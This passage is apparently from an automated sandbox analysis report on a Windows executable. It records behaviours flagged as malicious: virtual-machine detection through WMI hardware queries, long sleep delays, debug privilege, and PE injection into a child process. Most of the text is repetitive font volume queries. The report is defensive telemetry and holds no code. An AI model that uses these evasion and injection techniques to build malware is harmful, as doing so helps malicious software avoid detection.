          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe TID: 472Thread sleep time: -40023s >= -30000s
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe TID: 4320Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe TID: 1352Thread sleep count: 461 > 30
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeWindow / User API: threadDelayed 461
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeThread delayed: delay time: 40023
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeThread delayed: delay time: 922337203685477
          Source: Q4YODvoYjL.exe, 00000001.00000003.352966359.0000000000C68000.00000004.00000020.00020000.00000000.sdmp, Q4YODvoYjL.exe, 00000001.00000002.562716771.0000000000C77000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeMemory written: C:\Users\user\Desktop\Q4YODvoYjL.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeProcess created: C:\Users\user\Desktop\Q4YODvoYjL.exe C:\Users\user\Desktop\Q4YODvoYjL.exe
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Users\user\Desktop\Q4YODvoYjL.exe VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
